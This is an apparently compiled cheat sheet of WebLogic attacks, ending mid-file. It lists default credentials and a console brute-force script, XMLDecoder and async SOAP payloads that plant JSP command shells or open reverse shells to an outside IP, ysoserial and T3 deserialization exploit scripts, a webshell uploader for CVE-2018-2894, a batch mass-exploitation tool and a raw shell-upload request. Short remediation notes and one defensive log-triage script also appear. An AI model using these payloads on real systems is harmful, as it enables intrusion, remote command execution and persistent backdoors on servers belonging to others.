WebLogic vulnerability summary

Weak passwords

weblogic:weblogic
weblogic:weblogic123
weblogic:Oracle@123
system:password
admin:security
joe:password
mary:password
system:security
wlcsystem:wlcsystem
wlpisystem

Login page

/console/login/LoginForm.jsp

Brute-force script

import requests
import sys
def weakPasswd(url):
    """weak password"""

    pwddict = ['Weblogic', 'weblogic', 'weblogic123', 'Oracle@123', 'password', 'system', 'Administrator', 'admin',
               'security', 'joe', 'mary', 'wlcsystem', 'wlpisystem']
    for user in pwddict:
        for pwd in pwddict:
            data = {
                'j_username': user,
                'j_password': pwd,
                'j_character_encoding': 'UTF-8'
            }
            req = requests.post(url + '/console/j_security_check', data=data, allow_redirects=False,
                                verify=False)

            if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                print('[+] WebLogic  username: ' + user + '  password: ' + pwd)
                return True
    return False

if __name__=="__main__":
    if len(sys.argv)!=2 or sys.argv[1]=="-h":
        print("python3 test.py http://ip:port")
        exit()
    weakPasswd(sys.argv[1])

Go to the admin console

Deployments -> Install -> Upload your file(s) -> build a war package -> upload -> keep clicking Next -> Finish -> Save

Shell address: http://ip/filename/filename.jsp

WebLogic XMLDecoder deserialization vulnerability (CVE-2017-3506, CVE-2017-10271)

version

10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0

Exploitation

Vulnerable pages

/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

POST the payload below to one of these pages. Content-Type must be set to text/xml; a successful exploit returns HTTP 500.

Then visit the file path written by the PoC, e.g. bea_wls_internal/test.jsp

Detection PoC

Output

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter">
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("CVE-2017-10271"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Command execution

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<%   if("h3art3ars".equals(request.getParameter("password"))){  
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    } %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

bea_wls_internal/test.jsp?password=h3art3ars&command=whoami

Reverse shell

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

Remediation

Depending on the actual environment path, delete the WebLogic wls-wsat component; after deleting the related files, restart WebLogic and confirm that requests to wls-wsat/ return a 404 error.

Download the corresponding CVE-2017-10271 patch from Oracle.

WebLogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)

version

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

Exploitation

poc1

java -cp ysoserial.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 "ping -c1 `whoami`.lfagoh.ceye.io"

or poc2

(JRE version 1.7u21 or lower)
java -cp ysoserial.jar  ysoserial.exploit.JRMPListener [listen port] Jdk7u21  "ping -c1 `whoami`.lfagoh.ceye.io"

Then

python /usr/share/exploitdb/exploits/multiple/remote/44553.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] JRMPClient

Patch bypass (CVE-2018-2893)

Detection script

#!env python
# -*- coding: utf-8 -*-
import socket
import time
import re
import sys

VUL=['CVE-2018-2893']
#remote ip changed to :127.0.0.1
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

VER_SIG=['StreamMessageImpl']

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    data = sock.recv(1024)
    #print data
    print 'handshake successful'

def buildT3RequestObject(sock,port):
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))

def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res

def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])

def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ## Once the patch is applied the connection blocks, so set a timeout; default 15s, adjust as needed
    sock.settimeout(15)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    #print 'rs',rs
    checkVul(rs,server_addr,index)

if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip,dport,0)

Exploitation

java -jar ysoserial.jar JRMPClient "localip:localport"  > shell.cer

java -cp ysoserial.jar ysoserial.exploit.JRMPListener  5555 Jdk7u21 "touch /tmp/a.txt"

python weblogic.py [targetip] [port] shell.cer

weblogic.py

#!env python
# -*- coding: utf-8 -*-
import socket
import time
import re
import sys

VUL=['CVE-2018-2893']
#remote ip changed to :127.0.0.1
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

VER_SIG=['StreamMessageImpl']

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    data = sock.recv(1024)
    #print data
    print 'handshake successful'

def buildT3RequestObject(sock,port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665727
3696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))


def sendEvilObjData(sock,data):
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res

def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])


def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sock.settimeout(15)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    #print 'rs',rs
    checkVul(rs,server_addr,index)

if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip,dport,0)

WebLogic arbitrary file upload vulnerability (CVE-2018-2894)

version

10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3

The affected module is the Web Service Test Page, which can be enabled under base_domain -> Advanced -> Enable Web Service Test Page.

Exploitation

1.

Visit ws_utc/config.do and set Work Home Dir to /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

Then click Security -> Add -> upload the file -> Submit. Note the timestamp in the response.

Shell address: ws_utc/css/config/keystore/[timestamp]_[filename]

2.

Visit ws_utc/begin.do, click Import Test Case in the upper right corner and upload the shell. The shell address is in the response.

Detection and exploitation script

#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey

import re
import sys
import time
import argparse
import requests
import traceback
import xml.etree.ElementTree as ET


def get_current_work_path(host):
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    values = []
    try:
        request = requests.get(geturl)
        if request.status_code == 404:
            exit("[-] {}  don't exists CVE-2018-2894".format(host))
        elif "Deploying Application".lower() in request.text.lower():
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            request = requests.get(geturl, headers=ua)
        if "</defaultValue>" in request.content:
            root = ET.fromstring(request.content)
            value = root.find("section").find("options")
            for e in value:
                for sub in e:
                    if e.tag == "parameter" and sub.tag == "defaultValue":
                        values.append(sub.text)
    except requests.ConnectionError:
        exit("[-] Cannot connect url: {}".format(geturl))
    if values:
        return values[0]
    else:
        print("[-] Cannot get current work path\n")
        exit(request.content)


def get_new_work_path(host):
    origin_work_path = get_current_work_path(host)
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
    if "user_projects" in origin_work_path:
        if "\\" in origin_work_path:
            works = works.replace("/", "\\")
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
            dir_len = len(current_work_home.split("\\"))
            domain_name = origin_work_path.split("\\")[dir_len]
            current_work_home += "\\" + domain_name + works
        else:
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
            dir_len = len(current_work_home.split("/"))
            domain_name = origin_work_path.split("/")[dir_len]
            current_work_home += "/" + domain_name + works
    else:
        current_work_home = origin_work_path
        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
    return current_work_home


def set_new_upload_path(host, path):
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in request.content:
        return True
    else:
        print("[-] Change New Upload Path failed")
        exit(request.content)


def upload_webshell(host, uri):
    set_new_upload_path(host, get_new_work_path(host))
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": password,
        "ks_password_changed": "true",
        "ks_filename": ("360sglab.jsp", upload_content)
    }

    request = requests.post(host + uri, files=files)
    response = request.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
        if upload_content in requests.get(shell_path, headers=headers).content:
            print("[+] {} exists CVE-2018-2894".format(host))
            print("[+] Check URL: {} ".format(shell_path))
        else:
            print("[-] {}  don't exists CVE-2018-2894".format(host))
    else:
        print("[-] {}  don't exists CVE-2018-2894".format(host))


if __name__ == "__main__":
    start = time.time()
    password = "360sglab"
    url = "/ws_utc/resources/setting/keystore"
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
                        help="target, such as: http://example.com:7001")

    upload_content = "360sglab test"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }

    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    target = args.target

    target = target.rstrip('/')
    if "://" not in target:
        target = "http://" + target
    try:
        upload_webshell(target, url)
    except Exception as e:
        print("[-] Error: \n")
        traceback.print_exc()

Remediation

1. Require login authorization before Config.do and begin.do can be accessed;

2. IPS and similar defensive products can add the corresponding signatures;

3. Upgrade to the latest official version.

WebLogic deserialization remote code execution vulnerability (CVE-2019-2725)

version

Oracle WebLogic Server 10.*
Oracle WebLogic Server 12.1.3

Detection paths

/_async/AsyncResponseService
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceJms
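Added example, not code from the original post: a defender-side triage of access-log lines that covers the endpoint lists on this page (the /wls-wsat/ pages, /ws_utc/, the DeploymentService path and the /_async/ paths just listed), the cmd/command calling convention of the webshells shown here, and a burst rule for the /console/j_security_check POSTs that the brute-force script at the top of the page generates. It assumes an NCSA combined-format access log; the IP addresses and log lines are constructed.

```python
"""Offline triage of WebLogic access-log lines for the attack surface listed on this page."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Endpoint prefixes taken from the lists on this page. Once wls-wsat is removed and
# ws_utc / _async are gated behind a login, any hit here is a scan, an exploit
# attempt, or evidence that the fix did not stick.
WATCHED_PREFIXES = {
    "/wls-wsat/": "CVE-2017-10271/CVE-2017-3506",
    "/_async/": "CVE-2019-2725",
    "/ws_utc/": "CVE-2018-2894",
    "/bea_wls_deployment_internal/DeploymentService": "CVE-2018-3252/CVE-2019-2618",
}
LOGIN_PATH = "/console/j_security_check"   # posted to by the brute-force script above
LOGIN_BURST = 5                            # POSTs from one client inside LOGIN_WINDOW_SEC
LOGIN_WINDOW_SEC = 60
SHELL_PARAMS = ("command=", "cmd=")        # query parameters of the webshells on this page

# NCSA combined log line (assumed format): ip ident user [ts] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def analyze(lines):
    """Return (rule, client_ip, path, detail) tuples, in log order."""
    alerts = []
    login_posts = defaultdict(deque)   # client ip -> timestamps of its recent login POSTs
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        cve = next((c for p, c in WATCHED_PREFIXES.items() if path.startswith(p)), None)
        if cve:
            alerts.append(("exposed-endpoint", ip, path, cve))
        elif path.endswith(".jsp") and any(p in rec["query"].lower() for p in SHELL_PARAMS):
            # Heuristic: a .jsp taking cmd=/command= is the calling convention of the shells above.
            alerts.append(("webshell-param", ip, path, rec["query"]))
        elif path == LOGIN_PATH and rec["method"] == "POST":
            # j_security_check answers 302 to good and bad credentials alike (the brute-force
            # script tells them apart by the redirect target), so count POSTs, not status codes.
            hits = login_posts[ip]
            hits.append(rec["ts"])
            while (hits[-1] - hits[0]).total_seconds() > LOGIN_WINDOW_SEC:
                hits.popleft()
            if len(hits) == LOGIN_BURST:
                alerts.append(("console-login-burst", ip, path,
                               "%d POSTs within %ds" % (LOGIN_BURST, LOGIN_WINDOW_SEC)))
    return alerts


# Constructed sample log (not a real capture): a login burst, an XMLDecoder hit followed by
# a call to the dropped test.jsp, an _async probe, a ws_utc visit and one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2020:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4213
10.0.0.5 - - [10/Mar/2020:10:00:02 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
10.0.0.5 - - [10/Mar/2020:10:00:03 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
10.0.0.5 - - [10/Mar/2020:10:00:04 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
10.0.0.5 - - [10/Mar/2020:10:00:05 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
10.0.0.5 - - [10/Mar/2020:10:00:06 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
10.0.0.7 - - [10/Mar/2020:10:05:00 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 311
10.0.0.7 - - [10/Mar/2020:10:05:01 +0000] "GET /bea_wls_internal/test.jsp?password=x&command=id HTTP/1.1" 200 22
10.0.0.9 - - [10/Mar/2020:10:07:00 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0
10.0.0.9 - - [10/Mar/2020:10:08:00 +0000] "GET /ws_utc/begin.do HTTP/1.1" 200 9000
10.0.0.2 - - [10/Mar/2020:10:09:00 +0000] "GET /index.jsp HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print("%-20s %-10s %s  (%s)" % alert)
```

The prefix match is case-sensitive; on a Windows-hosted domain, where paths are matched case-insensitively, lower-case the path before comparing.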

Exploitation

import requests
import sys
if not (len(sys.argv)==4):
    print "使用方法:VPS监听端口 weblogic.py 目标网址 VPSip 端口"
else:
    try:
        url= "%s/_async/AsyncResponseService"  % (sys.argv[1])
        raw='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
        <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xxxxxxx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>bash -i >& /dev/tcp/%s/%s 0>&1</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>'''  % (sys.argv[2],sys.argv[3])
        print url
        header = {'content-type': 'text/xml'}
        r=requests.post(url,headers=header,data=raw)
        if (r.status_code==202):
            print "反弹成功!"
        else :
            print"漏洞不存在!"
    except:
        print "使用方法:VPS监听端口 weblogic.py 目标网址 VPSip 端口"

Batch

import gevent
from gevent import  monkey;monkey.patch_all()
import requests
import os
import sys
from multiprocessing import Process

class Weblogic:
    def __init__(self,headers,data,path):
        self.headers=headers
        self.data=data
        self.path=path

    def exploit(self,url):
        urls='{}{}'.format(str(url).rstrip('/').strip(),self.path)
        urls2='{}{}'.format(str(url).rstrip('/').strip(),'/_async/webshells.jsp')
        try:
            rqt=requests.get(url=urls,headers=self.headers)
            if rqt.status_code==200 and 'Test page' in rqt.text:
                rvt=requests.post(url=urls,headers=self.headers,data=self.data,timeout=3)
                if rvt.status_code==202:
                    rbt=requests.get(url=urls2,headers=headers)
                    if rbt.status_code==200 and not '404' in rbt.text:
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2,'123','{}?pwd=123&cmd=whoami'.format(urls2)))
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2, '123','{}?pwd=123&cmd=whoami'.format(urls2)),file=open('save.txt','a',encoding='utf-8'))
                    else:
                        print('[-] 利用失败 url:{} 状态码:{}'.format(rbt.url,rbt.status_code))
                else:
                    print('[-] 利用失败 url:{} 状态码:{}'.format(rvt.url,rvt.status_code))
            else:
                print('[-] 不存在weblogic反序列化漏洞-CVE-2019-48814 http状态码:{} url:{}'.format(rqt.status_code,urls))
        except:
            pass

    def xc(self,rw):
        xs=[]
        for r in rw:
            xs.append(gevent.spawn(self.exploit,r))

        gevent.joinall(xs)

    def djc(self,id):
        url_list=[]
        calc=0
        if str(id)=='1':
            print('[+] 单个url检测')
            xw=input('url>')
            self.exploit(url=xw)
        elif str(id)=='2':
            print('[+] 批量检测')
            xw=input(r'文件路径>')
            if os.path.exists(xw):
                print('[+] 找到对应的文件')
                with open(xw,'r',encoding='utf-8') as x:
                    calc+=1
                    if calc==100:
                        p=Process(target=self.xc,args=(url_list,))
                        p.start()
                        calc=0
                        url_list.clear()

                    for r in x.readlines():
                        qc="".join(r.split('\n'))
                        url_list.append(qc)

                if len(url_list)>0:
                    b = Process(target=self.xc, args=(url_list,))
                    b.start()
            else:
                print('[-] 找不到对应的文件')
                exit()

if __name__ == '__main__':
    headers={'user-agent':'Apache-HttpClient/4.1.1 (java 1.5)','Connection':'keep-alive','content-type': 'text/xml','Accept-Encoding':'gzip, deflate'}
    path='/_async/AsyncResponseService'
    data="""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>"""
    obj=Weblogic(headers=headers,data=data,path=path)
    obj.djc(sys.argv[1])

CVE-2018-3252

version

10.3.6.0
12.1.3.0
12.2.1.3

Detection

Requires account credentials. Avoids deploying a war package, which is easily noticed.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import re
import sys

def payload_module():
    #calc
    #payload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
    whoami
    payload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
    return payload.decode('hex')

def send_request(target,username,password):
    target = target + "/bea_wls_deployment_internal/DeploymentService"
    header_dict = {
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
        "wl_request_type":"data_transfer_request",
        "username": username,
        "password": password,
        "deployment_request_id": "108911",
        "serverName": "topsec"
    }
    try:
        request = requests.get(target)
        if request.status_code == 404:
            exit("{} - 404 not found".format(target))
        else:
            print "\n[*] Start detecting vulnerabilities...\n"
            results = requests.post(target, data=payload_module(), headers=header_dict).text
            print results
            c = re.findall(r'to (.+?)"',results)
            if len(c):
                if c[0] == "weblogic.deploy.service.DataTransferRequest":
                    print "[+] {} - exists CVE-2018-3252".format(target)
            else:
                print "[-] {} - don't exists CVE-2018-3252".format(target)
    except requests.ConnectionError:
        exit("[-] Cannot connect url: {}".format(target))

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "\n\tWebLogic DeploymentService 反序列化漏洞检测工具"
        print "\t\t\tCVEID: CVE-2018-3252"
        print "\nUsage: python CVE-2018-3252 http://localhost:7001 username password"
        exit(-1)
    else:
        target = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        send_request(target,username,password)

WebLogic arbitrary file upload vulnerability (requires credentials) (CVE-2019-2618)

version

10.3.6.0
12.1.3.0
12.2.1.3

Exploitation

With known credentials

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 192.168.119.130:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
serverName: weblogic
password: yourpassword
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 1081

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
